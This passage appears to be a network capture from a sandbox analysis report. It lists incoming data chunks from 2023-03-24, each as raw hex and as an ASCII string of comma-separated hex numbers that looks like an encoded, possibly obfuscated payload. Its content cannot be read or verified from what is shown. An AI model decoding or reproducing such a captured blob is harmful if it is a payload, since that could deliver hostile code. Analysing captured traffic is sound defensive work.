2023-03-24 14:28:23 UTC	1104	IN	Data Raw: 65 31 2c 35 37 2c 31 34 35 2c 38 34 2c 31 32 36 2c 63 31 2c 61 33 2c 31 36 34 2c 31 31 39 2c 31 32 36 2c 33 63 2c 31 35 64 2c 31 32 65 2c 37 38 2c 65 31 2c 39 62 2c 31 31 38 2c 63 33 2c 31 33 33 2c 39 35 2c 31 32 64 2c 63 33 2c 66 33 2c 31 31 32 2c 35 64 2c 31 33 33 2c 34 30 2c 31 31 39 2c 31 30 30 2c 63 34 2c 31 35 35 2c 62 31 2c 62 37 2c 64 61 2c 31 36 65 2c 31 30 34 2c 62 38 2c 31 30 33 2c 37 36 2c 66 37 2c 31 30 65 2c 31 30 66 2c 65 34 2c 62 38 2c 35 39 2c 63 31 2c 38 65 2c 61 63 2c 65 31 2c 31 33 65 2c 64 33 2c 62 64 2c 35 37 2c 31 31 66 2c 31 30 36 2c 31 34 64 2c 31 35 31 2c 31 30 36 2c 34 38 2c 66 36 2c 31 31 61 2c 62 34 2c 66 36 2c 66 39 2c 39 63 2c 37 63 2c 39 64 2c 38 31 2c 65 64 2c 31 32 65 2c 39 31 2c 39 33 2c 62 35 2c 36 62 2c 37 36 2c 61 62 Data Ascii: e1,57,145,84,126,c1,a3,164,119,126,3c,15d,12e,78,e1,9b,118,c3,133,95,12d,c3,f3,112,5d,133,40,119,100,c4,155,b1,b7,da,16e,104,b8,103,76,f7,10e,10f,e4,b8,59,c1,8e,ac,e1,13e,d3,bd,57,11f,106,14d,151,106,48,f6,11a,b4,f6,f9,9c,7c,9d,81,ed,12e,91,93,b5,6b,76,ab
2023-03-24 14:28:23 UTC	1120	IN	Data Raw: 32 35 2c 31 33 31 2c 65 30 2c 38 35 2c 61 33 2c 66 62 2c 65 38 2c 61 36 2c 36 39 2c 31 35 62 2c 31 35 36 2c 38 37 2c 61 34 2c 63 64 2c 65 35 2c 64 64 2c 37 65 2c 35 38 2c 38 37 2c 63 65 2c 34 39 2c 66 36 2c 31 34 34 2c 31 32 33 2c 62 37 2c 38 63 2c 64 33 2c 66 35 2c 31 36 36 2c 36 32 2c 31 31 35 2c 35 65 2c 31 35 30 2c 31 30 37 2c 61 64 2c 35 38 2c 66 38 2c 33 34 2c 31 33 65 2c 34 31 2c 39 66 2c 39 36 2c 66 35 2c 31 31 61 2c 38 62 2c 66 66 2c 38 37 2c 31 31 34 2c 62 65 2c 31 31 38 2c 64 66 2c 31 30 35 2c 63 61 2c 63 66 2c 31 30 62 2c 36 34 2c 65 64 2c 31 30 30 2c 31 30 34 2c 39 66 2c 31 34 64 2c 35 30 2c 39 33 2c 63 30 2c 31 35 61 2c 38 63 2c 62 65 2c 64 65 2c 37 65 2c 66 30 2c 39 61 2c 31 30 62 2c 38 30 2c 39 32 2c 64 32 2c 31 36 30 2c 39 64 2c 31 32 63 Data Ascii: 25,131,e0,85,a3,fb,e8,a6,69,15b,156,87,a4,cd,e5,dd,7e,58,87,ce,49,f6,144,123,b7,8c,d3,f5,166,62,115,5e,150,107,ad,58,f8,34,13e,41,9f,96,f5,11a,8b,ff,87,114,be,118,df,105,ca,cf,10b,64,ed,100,104,9f,14d,50,93,c0,15a,8c,be,de,7e,f0,9a,10b,80,92,d2,160,9d,12c
2023-03-24 14:28:23 UTC	1136	IN	Data Raw: 39 2c 37 37 2c 61 38 2c 38 65 2c 61 62 2c 31 33 31 2c 35 39 2c 36 33 2c 66 36 2c 31 34 61 2c 66 35 2c 31 30 35 2c 31 35 32 2c 31 31 35 2c 31 31 64 2c 38 38 2c 34 66 2c 35 66 2c 62 30 2c 66 32 2c 31 33 36 2c 35 36 2c 66 39 2c 31 33 39 2c 35 61 2c 31 30 32 2c 38 64 2c 31 34 62 2c 63 62 2c 31 33 66 2c 34 31 2c 61 33 2c 66 66 2c 34 38 2c 35 62 2c 65 61 2c 31 30 63 2c 31 34 66 2c 66 62 2c 36 35 2c 65 34 2c 31 35 33 2c 31 33 32 2c 38 33 2c 65 33 2c 62 61 2c 66 32 2c 31 33 62 2c 39 62 2c 39 36 2c 31 34 37 2c 37 31 2c 31 34 66 2c 64 38 2c 62 35 2c 62 36 2c 31 31 63 2c 39 65 2c 64 31 2c 31 32 64 2c 31 31 66 2c 31 31 36 2c 33 65 2c 37 32 2c 61 34 2c 31 30 62 2c 31 32 64 2c 38 65 2c 62 31 2c 61 35 2c 38 33 2c 31 33 64 2c 31 33 65 2c 63 34 2c 66 63 2c 35 65 2c 31 32 Data Ascii: 9,77,a8,8e,ab,131,59,63,f6,14a,f5,105,152,115,11d,88,4f,5f,b0,f2,136,56,f9,139,5a,102,8d,14b,cb,13f,41,a3,ff,48,5b,ea,10c,14f,fb,65,e4,153,132,83,e3,ba,f2,13b,9b,96,147,71,14f,d8,b5,b6,11c,9e,d1,12d,11f,116,3e,72,a4,10b,12d,8e,b1,a5,83,13d,13e,c4,fc,5e,12
2023-03-24 14:28:23 UTC	1152	IN	Data Raw: 2c 36 34 2c 36 37 2c 63 64 2c 64 36 2c 66 33 2c 62 30 2c 63 65 2c 31 33 32 2c 65 63 2c 38 38 2c 37 33 2c 65 34 2c 38 36 2c 31 35 35 2c 31 34 32 2c 65 36 2c 33 30 2c 31 33 65 2c 39 37 2c 31 30 63 2c 31 30 34 2c 37 37 2c 38 32 2c 31 30 30 2c 38 66 2c 31 34 63 2c 61 65 2c 31 30 37 2c 64 37 2c 64 31 2c 36 65 2c 37 65 2c 36 63 2c 31 34 65 2c 31 33 66 2c 31 35 31 2c 31 32 31 2c 31 31 34 2c 31 36 33 2c 37 38 2c 61 32 2c 31 31 64 2c 31 32 37 2c 37 64 2c 62 65 2c 63 36 2c 62 39 2c 61 34 2c 65 38 2c 31 30 32 2c 31 32 66 2c 36 61 2c 64 62 2c 64 65 2c 31 31 37 2c 64 32 2c 39 32 2c 36 30 2c 63 35 2c 31 30 36 2c 65 34 2c 31 32 31 2c 66 32 2c 61 39 2c 31 31 63 2c 62 32 2c 34 66 2c 65 34 2c 31 31 33 2c 61 32 2c 31 31 36 2c 39 33 2c 31 35 33 2c 61 31 2c 31 30 66 2c 37 38 Data Ascii: ,64,67,cd,d6,f3,b0,ce,132,ec,88,73,e4,86,155,142,e6,30,13e,97,10c,104,77,82,100,8f,14c,ae,107,d7,d1,6e,7e,6c,14e,13f,151,121,114,163,78,a2,11d,127,7d,be,c6,b9,a4,e8,102,12f,6a,db,de,117,d2,92,60,c5,106,e4,121,f2,a9,11c,b2,4f,e4,113,a2,116,93,153,a1,10f,78
2023-03-24 14:28:23 UTC	1168	IN	Data Raw: 31 31 65 2c 31 31 35 2c 61 63 2c 66 33 2c 31 33 36 2c 31 33 35 2c 31 34 65 2c 31 30 61 2c 37 38 2c 31 33 34 2c 37 61 2c 31 31 38 2c 39 38 2c 62 66 2c 62 36 2c 62 35 2c 38 31 2c 62 36 2c 65 39 2c 38 62 2c 61 65 2c 65 62 2c 66 36 2c 65 62 2c 63 62 2c 61 63 2c 35 35 2c 39 65 2c 35 38 2c 65 31 2c 37 32 2c 37 30 2c 62 62 2c 62 61 2c 62 36 2c 31 30 36 2c 37 65 2c 63 64 2c 31 30 38 2c 31 33 61 2c 35 65 2c 38 66 2c 64 37 2c 65 62 2c 31 31 34 2c 38 38 2c 37 61 2c 31 32 66 2c 39 30 2c 61 33 2c 31 31 39 2c 39 38 2c 63 31 2c 35 37 2c 31 30 65 2c 31 32 36 2c 38 65 2c 65 36 2c 33 35 2c 31 34 35 2c 63 63 2c 65 36 2c 64 61 2c 31 34 65 2c 31 31 39 2c 38 33 2c 31 33 31 2c 31 33 38 2c 62 30 2c 31 37 35 2c 63 66 2c 31 35 32 2c 35 39 2c 63 64 2c 38 64 2c 31 30 39 2c 66 62 2c Data Ascii: 11e,115,ac,f3,136,135,14e,10a,78,134,7a,118,98,bf,b6,b5,81,b6,e9,8b,ae,eb,f6,eb,cb,ac,55,9e,58,e1,72,70,bb,ba,b6,106,7e,cd,108,13a,5e,8f,d7,eb,114,88,7a,12f,90,a3,119,98,c1,57,10e,126,8e,e6,35,145,cc,e6,da,14e,119,83,131,138,b0,175,cf,152,59,cd,8d,109,fb,
2023-03-24 14:28:23 UTC	1184	IN	Data Raw: 2c 39 65 2c 35 35 2c 36 37 2c 31 33 35 2c 36 38 2c 38 62 2c 36 30 2c 31 35 65 2c 31 31 61 2c 31 30 36 2c 37 35 2c 35 39 2c 38 37 2c 39 37 2c 66 63 2c 66 33 2c 31 30 34 2c 39 33 2c 31 30 33 2c 61 65 2c 63 31 2c 36 65 2c 62 65 2c 37 31 2c 31 35 37 2c 34 31 2c 64 63 2c 38 38 2c 31 30 63 2c 61 62 2c 65 36 2c 65 34 2c 31 33 38 2c 31 33 62 2c 35 37 2c 64 36 2c 36 33 2c 35 39 2c 38 38 2c 39 66 2c 64 34 2c 65 63 2c 36 66 2c 31 32 30 2c 31 32 65 2c 39 30 2c 31 37 35 2c 31 33 31 2c 37 39 2c 31 34 36 2c 64 64 2c 31 30 33 2c 61 38 2c 37 32 2c 62 64 2c 39 62 2c 38 36 2c 63 30 2c 31 36 66 2c 39 39 2c 31 31 37 2c 36 31 2c 31 31 39 2c 39 62 2c 65 31 2c 31 33 31 2c 39 34 2c 31 31 65 2c 31 32 35 2c 39 61 2c 63 64 2c 31 35 66 2c 37 37 2c 31 32 61 2c 37 64 2c 31 32 31 2c 65 Data Ascii: ,9e,55,67,135,68,8b,60,15e,11a,106,75,59,87,97,fc,f3,104,93,103,ae,c1,6e,be,71,157,41,dc,88,10c,ab,e6,e4,138,13b,57,d6,63,59,88,9f,d4,ec,6f,120,12e,90,175,131,79,146,dd,103,a8,72,bd,9b,86,c0,16f,99,117,61,119,9b,e1,131,94,11e,125,9a,cd,15f,77,12a,7d,121,e
2023-03-24 14:28:23 UTC	1200	IN	Data Raw: 31 2c 39 36 2c 38 31 2c 66 35 2c 64 64 2c 65 37 2c 31 31 30 2c 38 39 2c 34 62 2c 64 34 2c 31 30 63 2c 39 36 2c 64 62 2c 63 34 2c 36 37 2c 65 32 2c 35 38 2c 31 35 33 2c 31 31 30 2c 33 63 2c 61 38 2c 31 30 36 2c 63 33 2c 31 33 66 2c 31 32 32 2c 31 32 64 2c 31 36 39 2c 33 62 2c 61 64 2c 66 64 2c 39 62 2c 39 61 2c 38 33 2c 31 31 35 2c 62 64 2c 66 61 2c 31 30 32 2c 38 30 2c 39 31 2c 31 33 37 2c 63 64 2c 31 30 36 2c 36 36 2c 35 66 2c 31 34 65 2c 31 35 31 2c 65 61 2c 31 30 38 2c 33 36 2c 39 64 2c 38 39 2c 39 37 2c 31 32 31 2c 62 31 2c 31 35 65 2c 64 39 2c 36 35 2c 35 66 2c 63 30 2c 39 62 2c 62 63 2c 35 66 2c 39 34 2c 37 66 2c 31 30 64 2c 39 33 2c 61 66 2c 31 33 63 2c 31 33 37 2c 39 64 2c 31 31 35 2c 31 31 32 2c 61 34 2c 31 32 39 2c 38 31 2c 66 65 2c 35 61 2c 31 Data Ascii: 1,96,81,f5,dd,e7,110,89,4b,d4,10c,96,db,c4,67,e2,58,153,110,3c,a8,106,c3,13f,122,12d,169,3b,ad,fd,9b,9a,83,115,bd,fa,102,80,91,137,cd,106,66,5f,14e,151,ea,108,36,9d,89,97,121,b1,15e,d9,65,5f,c0,9b,bc,5f,94,7f,10d,93,af,13c,137,9d,115,112,a4,129,81,fe,5a,1
2023-03-24 14:28:23 UTC	1216	IN	Data Raw: 2c 35 38 2c 31 30 34 2c 31 33 64 2c 39 66 2c 35 37 2c 38 37 2c 63 31 2c 31 30 34 2c 33 64 2c 39 39 2c 31 33 66 2c 65 32 2c 31 34 38 2c 61 36 2c 31 30 64 2c 66 30 2c 63 33 2c 31 32 61 2c 37 39 2c 38 66 2c 31 31 66 2c 31 35 30 2c 31 35 65 2c 64 64 2c 37 62 2c 63 38 2c 31 30 33 2c 62 37 2c 37 39 2c 37 66 2c 37 39 2c 35 65 2c 31 33 36 2c 38 64 2c 63 33 2c 39 66 2c 62 36 2c 61 64 2c 31 33 37 2c 31 35 66 2c 35 63 2c 39 32 2c 31 30 36 2c 66 31 2c 66 65 2c 39 61 2c 37 33 2c 31 33 34 2c 35 36 2c 34 65 2c 64 64 2c 35 31 2c 37 30 2c 61 33 2c 31 35 66 2c 62 33 2c 61 66 2c 65 63 2c 61 35 2c 31 35 34 2c 66 63 2c 63 62 2c 36 64 2c 63 62 2c 62 61 2c 64 34 2c 31 33 38 2c 31 32 64 2c 65 38 2c 31 33 33 2c 31 35 36 2c 31 36 38 2c 36 63 2c 31 31 62 2c 31 34 61 2c 31 30 64 2c Data Ascii: ,58,104,13d,9f,57,87,c1,104,3d,99,13f,e2,148,a6,10d,f0,c3,12a,79,8f,11f,150,15e,dd,7b,c8,103,b7,79,7f,79,5e,136,8d,c3,9f,b6,ad,137,15f,5c,92,106,f1,fe,9a,73,134,56,4e,dd,51,70,a3,15f,b3,af,ec,a5,154,fc,cb,6d,cb,ba,d4,138,12d,e8,133,156,168,6c,11b,14a,10d,
2023-03-24 14:28:23 UTC	1232	IN	Data Raw: 31 2c 38 36 2c 38 32 2c 61 63 2c 37 61 2c 31 32 62 2c 31 32 34 2c 66 37 2c 64 62 2c 38 32 2c 31 31 37 2c 31 32 38 2c 31 35 66 2c 65 38 2c 36 36 2c 62 39 2c 31 37 33 2c 31 34 31 2c 65 34 2c 63 66 2c 36 33 2c 31 32 36 2c 63 33 2c 66 65 2c 39 66 2c 31 37 37 2c 31 35 64 2c 65 33 2c 39 63 2c 66 34 2c 37 63 2c 64 39 2c 38 65 2c 66 62 2c 61 32 2c 64 62 2c 38 34 2c 61 38 2c 31 32 63 2c 31 30 35 2c 61 63 2c 63 35 2c 39 36 2c 36 37 2c 63 63 2c 66 37 2c 39 64 2c 65 31 2c 31 31 32 2c 65 63 2c 31 30 36 2c 31 34 32 2c 39 39 2c 31 32 37 2c 61 61 2c 64 38 2c 31 32 36 2c 65 38 2c 62 38 2c 31 34 64 2c 38 62 2c 37 64 2c 31 35 32 2c 61 30 2c 31 33 66 2c 36 35 2c 31 34 37 2c 63 39 2c 34 38 2c 35 33 2c 66 35 2c 38 65 2c 64 34 2c 37 37 2c 37 61 2c 64 32 2c 62 32 2c 31 33 37 2c Data Ascii: 1,86,82,ac,7a,12b,124,f7,db,82,117,128,15f,e8,66,b9,173,141,e4,cf,63,126,c3,fe,9f,177,15d,e3,9c,f4,7c,d9,8e,fb,a2,db,84,a8,12c,105,ac,c5,96,67,cc,f7,9d,e1,112,ec,106,142,99,127,aa,d8,126,e8,b8,14d,8b,7d,152,a0,13f,65,147,c9,48,53,f5,8e,d4,77,7a,d2,b2,137,
2023-03-24 14:28:23 UTC	1248	IN	Data Raw: 32 2c 65 35 2c 66 30 2c 66 65 2c 36 32 2c 63 61 2c 35 63 2c 39 33 2c 31 31 39 2c 31 32 62 2c 31 30 39 2c 64 39 2c 31 34 62 2c 39 33 2c 35 61 2c 31 31 31 2c 31 36 34 2c 38 32 2c 66 35 2c 64 32 2c 31 34 64 2c 62 63 2c 31 33 65 2c 63 35 2c 39 33 2c 62 31 2c 31 34 33 2c 36 35 2c 63 39 2c 31 31 33 2c 39 34 2c 65 33 2c 65 34 2c 38 35 2c 31 36 66 2c 62 61 2c 66 33 2c 31 31 63 2c 34 64 2c 61 35 2c 62 31 2c 36 63 2c 39 65 2c 31 31 30 2c 61 65 2c 65 65 2c 31 32 61 2c 62 32 2c 65 63 2c 65 66 2c 66 37 2c 31 30 38 2c 31 32 61 2c 39 36 2c 65 34 2c 36 31 2c 63 62 2c 35 62 2c 62 31 2c 35 63 2c 63 30 2c 62 63 2c 37 34 2c 64 35 2c 64 65 2c 64 66 2c 61 63 2c 31 32 37 2c 31 34 37 2c 64 64 2c 36 32 2c 34 31 2c 31 34 66 2c 35 36 2c 64 63 2c 62 33 2c 31 33 35 2c 65 39 2c 62 39 Data Ascii: 2,e5,f0,fe,62,ca,5c,93,119,12b,109,d9,14b,93,5a,111,164,82,f5,d2,14d,bc,13e,c5,93,b1,143,65,c9,113,94,e3,e4,85,16f,ba,f3,11c,4d,a5,b1,6c,9e,110,ae,ee,12a,b2,ec,ef,f7,108,12a,96,e4,61,cb,5b,b1,5c,c0,bc,74,d5,de,df,ac,127,147,dd,62,41,14f,56,dc,b3,135,e9,b9
2023-03-24 14:28:23 UTC	1264	IN	Data Raw: 64 32 2c 64 32 2c 63 35 2c 64 30 2c 31 36 31 2c 31 32 64 2c 31 30 30 2c 61 30 2c 63 62 2c 64 32 2c 31 32 65 2c 62 62 2c 62 34 2c 63 34 2c 39 31 2c 31 36 31 2c 65 34 2c 38 63 2c 64 30 2c 31 31 39 2c 36 30 2c 31 34 32 2c 31 35 39 2c 63 62 2c 62 32 2c 39 30 2c 63 34 2c 36 31 2c 35 38 2c 61 32 2c 31 32 39 2c 66 38 2c 37 38 2c 64 31 2c 31 32 66 2c 31 34 37 2c 66 34 2c 31 37 30 2c 62 39 2c 62 36 2c 31 32 61 2c 36 64 2c 37 37 2c 62 63 2c 31 34 34 2c 39 34 2c 31 34 34 2c 66 65 2c 63 63 2c 31 30 30 2c 36 38 2c 66 33 2c 63 38 2c 31 32 61 2c 31 30 35 2c 39 38 2c 31 32 36 2c 33 33 2c 64 65 2c 37 30 2c 37 31 2c 36 31 2c 38 30 2c 63 33 2c 62 37 2c 61 31 2c 61 35 2c 65 37 2c 66 31 2c 31 32 33 2c 31 31 31 2c 65 30 2c 37 39 2c 31 32 37 2c 31 33 64 2c 64 34 2c 31 34 30 2c Data Ascii: d2,d2,c5,d0,161,12d,100,a0,cb,d2,12e,bb,b4,c4,91,161,e4,8c,d0,119,60,142,159,cb,b2,90,c4,61,58,a2,129,f8,78,d1,12f,147,f4,170,b9,b6,12a,6d,77,bc,144,94,144,fe,cc,100,68,f3,c8,12a,105,98,126,33,de,70,71,61,80,c3,b7,a1,a5,e7,f1,123,111,e0,79,127,13d,d4,140,
2023-03-24 14:28:23 UTC	1280	IN	Data Raw: 35 2c 64 30 2c 64 36 2c 65 30 2c 62 35 2c 31 33 32 2c 66 30 2c 33 38 2c 31 34 35 2c 38 36 2c 31 32 64 2c 38 30 2c 66 34 2c 63 37 2c 38 31 2c 31 32 33 2c 31 32 35 2c 63 34 2c 66 65 2c 31 33 35 2c 61 31 2c 64 35 2c 31 34 36 2c 38 66 2c 64 30 2c 37 62 2c 64 65 2c 31 34 37 2c 39 62 2c 39 37 2c 36 33 2c 31 36 39 2c 31 32 30 2c 38 37 2c 31 33 64 2c 38 33 2c 64 39 2c 37 35 2c 62 37 2c 33 66 2c 31 35 30 2c 61 34 2c 31 33 34 2c 64 30 2c 31 34 62 2c 31 32 64 2c 37 63 2c 38 64 2c 31 33 65 2c 64 63 2c 31 30 63 2c 31 31 37 2c 61 36 2c 64 39 2c 61 35 2c 65 35 2c 65 37 2c 37 34 2c 65 63 2c 31 31 35 2c 31 30 64 2c 37 30 2c 39 66 2c 38 30 2c 37 38 2c 38 61 2c 38 61 2c 31 33 64 2c 39 39 2c 62 66 2c 31 32 37 2c 33 33 2c 37 36 2c 34 39 2c 39 61 2c 31 34 61 2c 31 34 37 2c 31 Data Ascii: 5,d0,d6,e0,b5,132,f0,38,145,86,12d,80,f4,c7,81,123,125,c4,fe,135,a1,d5,146,8f,d0,7b,de,147,9b,97,63,169,120,87,13d,83,d9,75,b7,3f,150,a4,134,d0,14b,12d,7c,8d,13e,dc,10c,117,a6,d9,a5,e5,e7,74,ec,115,10d,70,9f,80,78,8a,8a,13d,99,bf,127,33,76,49,9a,14a,147,1
2023-03-24 14:28:23 UTC	1296	IN	Data Raw: 31 30 61 2c 65 63 2c 61 62 2c 31 35 35 2c 31 35 35 2c 35 30 2c 31 32 66 2c 38 31 2c 31 34 35 2c 66 62 2c 36 30 2c 39 31 2c 38 32 2c 37 33 2c 35 33 2c 66 39 2c 31 30 38 2c 31 32 34 2c 39 37 2c 66 39 2c 66 37 2c 38 39 2c 66 35 2c 38 32 2c 31 31 34 2c 31 33 37 2c 38 32 2c 37 31 2c 31 30 66 2c 34 61 2c 37 35 2c 31 36 61 2c 31 36 31 2c 31 31 62 2c 34 35 2c 31 35 30 2c 65 33 2c 31 32 35 2c 39 39 2c 65 35 2c 38 66 2c 64 39 2c 31 31 65 2c 36 66 2c 63 36 2c 31 31 62 2c 62 31 2c 65 31 2c 38 66 2c 62 63 2c 31 33 61 2c 65 37 2c 35 39 2c 36 30 2c 31 30 64 2c 37 39 2c 62 33 2c 66 34 2c 66 63 2c 36 65 2c 37 62 2c 61 37 2c 38 33 2c 64 35 2c 65 31 2c 66 36 2c 31 32 61 2c 61 65 2c 37 30 2c 38 62 2c 66 39 2c 31 33 38 2c 31 31 33 2c 31 30 34 2c 64 37 2c 38 33 2c 31 33 30 2c Data Ascii: 10a,ec,ab,155,155,50,12f,81,145,fb,60,91,82,73,53,f9,108,124,97,f9,f7,89,f5,82,114,137,82,71,10f,4a,75,16a,161,11b,45,150,e3,125,99,e5,8f,d9,11e,6f,c6,11b,b1,e1,8f,bc,13a,e7,59,60,10d,79,b3,f4,fc,6e,7b,a7,83,d5,e1,f6,12a,ae,70,8b,f9,138,113,104,d7,83,130,
2023-03-24 14:28:23 UTC	1312	IN	Data Raw: 2c 38 66 2c 31 30 31 2c 61 62 2c 39 32 2c 62 66 2c 39 39 2c 64 36 2c 31 31 30 2c 31 30 62 2c 36 36 2c 31 33 38 2c 33 64 2c 31 33 35 2c 64 66 2c 35 36 2c 31 32 66 2c 31 30 65 2c 65 62 2c 62 63 2c 31 31 64 2c 31 31 63 2c 39 39 2c 31 31 30 2c 35 63 2c 38 62 2c 36 64 2c 31 35 34 2c 63 34 2c 35 37 2c 64 62 2c 31 35 33 2c 31 34 65 2c 64 35 2c 35 38 2c 62 61 2c 31 30 61 2c 34 63 2c 66 65 2c 39 32 2c 37 63 2c 31 35 33 2c 61 39 2c 31 32 37 2c 31 30 32 2c 61 32 2c 31 32 34 2c 62 37 2c 31 34 36 2c 63 66 2c 31 33 64 2c 31 32 38 2c 31 33 62 2c 38 33 2c 31 33 61 2c 61 61 2c 31 30 30 2c 39 30 2c 61 61 2c 31 34 62 2c 61 34 2c 63 39 2c 31 33 64 2c 36 37 2c 63 32 2c 65 37 2c 63 36 2c 63 62 2c 38 39 2c 31 32 35 2c 31 30 31 2c 31 32 30 2c 31 31 62 2c 38 32 2c 63 61 2c 62 38 Data Ascii: ,8f,101,ab,92,bf,99,d6,110,10b,66,138,3d,135,df,56,12f,10e,eb,bc,11d,11c,99,110,5c,8b,6d,154,c4,57,db,153,14e,d5,58,ba,10a,4c,fe,92,7c,153,a9,127,102,a2,124,b7,146,cf,13d,128,13b,83,13a,aa,100,90,aa,14b,a4,c9,13d,67,c2,e7,c6,cb,89,125,101,120,11b,82,ca,b8
2023-03-24 14:28:23 UTC	1328	IN	Data Raw: 36 66 2c 31 32 36 2c 39 37 2c 65 39 2c 62 63 2c 31 32 38 2c 31 33 35 2c 62 66 2c 37 61 2c 64 32 2c 65 65 2c 31 34 62 2c 62 64 2c 31 31 37 2c 36 38 2c 39 30 2c 31 31 31 2c 35 33 2c 36 34 2c 31 31 35 2c 61 65 2c 31 34 32 2c 66 66 2c 61 64 2c 66 64 2c 31 37 32 2c 66 37 2c 31 30 31 2c 37 37 2c 61 65 2c 31 32 64 2c 31 31 66 2c 31 31 66 2c 31 32 32 2c 31 34 34 2c 31 32 36 2c 65 65 2c 31 32 34 2c 66 31 2c 63 38 2c 37 64 2c 64 34 2c 65 33 2c 64 37 2c 62 32 2c 62 30 2c 35 65 2c 36 33 2c 37 61 2c 39 33 2c 31 32 39 2c 31 31 38 2c 62 62 2c 61 31 2c 39 34 2c 61 63 2c 31 30 64 2c 38 38 2c 31 34 62 2c 31 32 31 2c 31 30 36 2c 31 33 35 2c 31 34 65 2c 35 63 2c 64 37 2c 64 65 2c 31 30 64 2c 64 35 2c 62 65 2c 35 66 2c 31 33 38 2c 39 38 2c 36 65 2c 37 35 2c 36 64 2c 65 36 2c Data Ascii: 6f,126,97,e9,bc,128,135,bf,7a,d2,ee,14b,bd,117,68,90,111,53,64,115,ae,142,ff,ad,fd,172,f7,101,77,ae,12d,11f,11f,122,144,126,ee,124,f1,c8,7d,d4,e3,d7,b2,b0,5e,63,7a,93,129,118,bb,a1,94,ac,10d,88,14b,121,106,135,14e,5c,d7,de,10d,d5,be,5f,138,98,6e,75,6d,e6,
2023-03-24 14:28:23 UTC	1344	IN	Data Raw: 2c 64 36 2c 65 32 2c 31 31 62 2c 31 32 61 2c 35 66 2c 65 31 2c 37 34 2c 38 65 2c 64 33 2c 65 37 2c 39 31 2c 61 36 2c 65 63 2c 61 31 2c 35 36 2c 31 34 65 2c 65 66 2c 31 35 33 2c 37 63 2c 31 32 66 2c 61 61 2c 65 66 2c 64 39 2c 36 31 2c 31 30 38 2c 37 39 2c 63 31 2c 36 65 2c 38 31 2c 36 35 2c 31 31 31 2c 31 34 34 2c 31 33 61 2c 36 64 2c 35 34 2c 38 64 2c 31 32 33 2c 37 64 2c 31 34 35 2c 61 62 2c 31 34 38 2c 31 34 64 2c 39 64 2c 31 35 34 2c 31 34 32 2c 36 65 2c 31 32 38 2c 35 62 2c 31 32 65 2c 36 62 2c 37 30 2c 66 34 2c 31 31 63 2c 66 37 2c 62 64 2c 61 34 2c 65 39 2c 31 35 39 2c 62 34 2c 31 32 63 2c 61 30 2c 37 66 2c 39 39 2c 31 34 66 2c 31 30 34 2c 36 63 2c 31 31 61 2c 66 36 2c 31 33 65 2c 39 36 2c 61 39 2c 31 30 64 2c 31 30 64 2c 38 66 2c 64 66 2c 31 34 64 Data Ascii: ,d6,e2,11b,12a,5f,e1,74,8e,d3,e7,91,a6,ec,a1,56,14e,ef,153,7c,12f,aa,ef,d9,61,108,79,c1,6e,81,65,111,144,13a,6d,54,8d,123,7d,145,ab,148,14d,9d,154,142,6e,128,5b,12e,6b,70,f4,11c,f7,bd,a4,e9,159,b4,12c,a0,7f,99,14f,104,6c,11a,f6,13e,96,a9,10d,10d,8f,df,14d
2023-03-24 14:28:23 UTC	1360	IN	Data Raw: 2c 31 34 35 2c 39 37 2c 39 34 2c 33 34 2c 31 34 35 2c 31 32 32 2c 31 34 64 2c 31 30 32 2c 65 62 2c 31 35 35 2c 61 30 2c 31 33 35 2c 37 62 2c 66 32 2c 31 32 64 2c 65 66 2c 63 32 2c 31 32 62 2c 61 65 2c 31 32 66 2c 37 65 2c 37 34 2c 34 63 2c 31 32 39 2c 39 64 2c 31 33 62 2c 37 38 2c 65 32 2c 39 65 2c 65 62 2c 63 31 2c 31 34 32 2c 35 62 2c 35 65 2c 35 35 2c 62 61 2c 35 65 2c 65 36 2c 39 66 2c 31 35 61 2c 31 34 33 2c 37 62 2c 35 36 2c 61 31 2c 66 62 2c 62 38 2c 37 63 2c 31 32 65 2c 61 37 2c 31 31 64 2c 31 31 38 2c 33 34 2c 31 32 62 2c 64 32 2c 31 33 36 2c 66 30 2c 64 34 2c 63 66 2c 31 32 38 2c 31 30 32 2c 64 36 2c 31 34 65 2c 61 35 2c 65 66 2c 31 32 33 2c 31 34 34 2c 31 33 63 2c 38 34 2c 61 32 2c 31 31 62 2c 66 37 2c 31 30 34 2c 31 35 39 2c 65 39 2c 36 36 2c Data Ascii: ,145,97,94,34,145,122,14d,102,eb,155,a0,135,7b,f2,12d,ef,c2,12b,ae,12f,7e,74,4c,129,9d,13b,78,e2,9e,eb,c1,142,5b,5e,55,ba,5e,e6,9f,15a,143,7b,56,a1,fb,b8,7c,12e,a7,11d,118,34,12b,d2,136,f0,d4,cf,128,102,d6,14e,a5,ef,123,144,13c,84,a2,11b,f7,104,159,e9,66,
2023-03-24 14:28:23 UTC	1376	IN	Data Raw: 32 2c 31 30 64 2c 35 65 2c 31 33 38 2c 31 31 64 2c 63 31 2c 37 66 2c 64 37 2c 31 35 34 2c 31 32 62 2c 39 65 2c 36 64 2c 63 36 2c 63 34 2c 61 30 2c 61 62 2c 64 64 2c 36 37 2c 65 30 2c 38 62 2c 31 34 63 2c 66 33 2c 39 30 2c 31 31 37 2c 33 32 2c 31 31 39 2c 65 31 2c 62 36 2c 61 66 2c 39 35 2c 36 31 2c 39 37 2c 31 32 32 2c 39 38 2c 65 37 2c 31 32 39 2c 37 39 2c 65 35 2c 31 30 61 2c 37 30 2c 35 39 2c 31 31 38 2c 31 30 65 2c 39 33 2c 39 64 2c 64 38 2c 39 64 2c 36 65 2c 63 37 2c 31 34 38 2c 31 33 39 2c 38 64 2c 37 35 2c 63 30 2c 37 62 2c 61 65 2c 38 36 2c 39 33 2c 65 61 2c 31 36 32 2c 39 64 2c 37 33 2c 39 63 2c 31 33 33 2c 37 61 2c 61 39 2c 66 64 2c 63 37 2c 38 34 2c 63 33 2c 31 30 38 2c 37 66 2c 39 35 2c 31 31 31 2c 31 35 39 2c 31 32 33 2c 31 30 37 2c 62 30 2c Data Ascii: 2,10d,5e,138,11d,c1,7f,d7,154,12b,9e,6d,c6,c4,a0,ab,dd,67,e0,8b,14c,f3,90,117,32,119,e1,b6,af,95,61,97,122,98,e7,129,79,e5,10a,70,59,118,10e,93,9d,d8,9d,6e,c7,148,139,8d,75,c0,7b,ae,86,93,ea,162,9d,73,9c,133,7a,a9,fd,c7,84,c3,108,7f,95,111,159,123,107,b0,
